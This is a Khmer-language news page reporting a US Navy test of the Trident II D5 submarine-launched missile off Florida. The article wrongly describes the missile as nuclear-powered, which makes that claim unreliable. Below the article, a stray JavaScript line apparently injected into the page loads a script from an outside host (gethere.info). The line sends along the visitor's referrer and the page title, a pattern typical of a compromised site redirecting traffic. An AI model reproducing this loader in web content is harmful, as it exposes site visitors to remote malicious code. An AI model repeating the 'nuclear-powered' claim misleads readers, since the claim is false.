ព្រឹតិ្តការណ៍ថ្មីៗ

សហរដ្ឋអាមេរិក សាកល្បងសមត្ថភាព គ្រាប់មីស៊ីល Trident II D5ថ្មី ដើរដោយថាមពេល នុយក្លេអ៊ែរ

1 ឆ្នាំ មុន 0 តូ សុផល

ប្រភពព័ត៌មានរបស់ The National Interest ចុះផ្សាយកាលពីថ្ងៃចន្ទបានឲ្យដឹងថា នាវាមុជទឹកអាមេរិកដែល មាន បំពាក់ជាមួយនឹងមីស៊ីល ប្រភេទ Trident II D5 ដែលជាមីស៊ីលប្រភេទថ្មី ដើរដោយថាមពលនុយក្លេអ៊ែរ កំពុងតែធ្វើការយាមល្បាត យ៉ាងស្ងាត់ស្ងៀមនៅក្នុងតំបន់ ដែនសមុទ្រដែលខ្លួន ត្រួតត្រាដើម្បីធានាបាននូវ សុវត្តិភាពនិង សន្តិសុខសម្រាប់ពិភពលោក ។
Trident II D5 ដែលជាមីស៊ីលដែលមានប្រវែង ប្រមាណជាជាង១៣ម៉ែត្រហើយកងទ័ពជើងទឹក អាមេរិក គឺកំពុង ស្ថិតនៅក្នុងពេលវេលាសាកល្បង ក្នុងការប្រើប្រាស់នូវប្រភេទមីស៊ីលនេះ នៅឡើយទាំងសមត្ថភាពប្រយុទ្ធ និងការអភិវឌ្ឍបន្ថែមផ្នែកបច្ចេកវិទ្យា ។
យោងតាមប្រភពព័ត៌មាន ដដែលបានបញ្ជាក់ទៀតថា ការសាកល្បងបាញ់មីស៊ីលប្រភេទថ្មីដែលដើរដោយថាមពេល នុយក្លេអ៊ែរនេះត្រូវបានធ្វើឡើងកាលពីប៉ុន្មាន ខែមុននៅក្បែរឆ្នេរនៃរដ្ឋហ្វ្លរីដា និងទទួលលទ្ធផលយ៉ាងជោគជ័យ គឺជាការបាញ់តេស្តសាកល្បង ជោគជ័យលើកទី១៦១ នៃគ្រាប់មីស៊ីលប្រភេទ Trident II គិតចាប់ពីការរចនាវាលើកដំបូង នាឆ្នាំ១៩៨៩មក ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ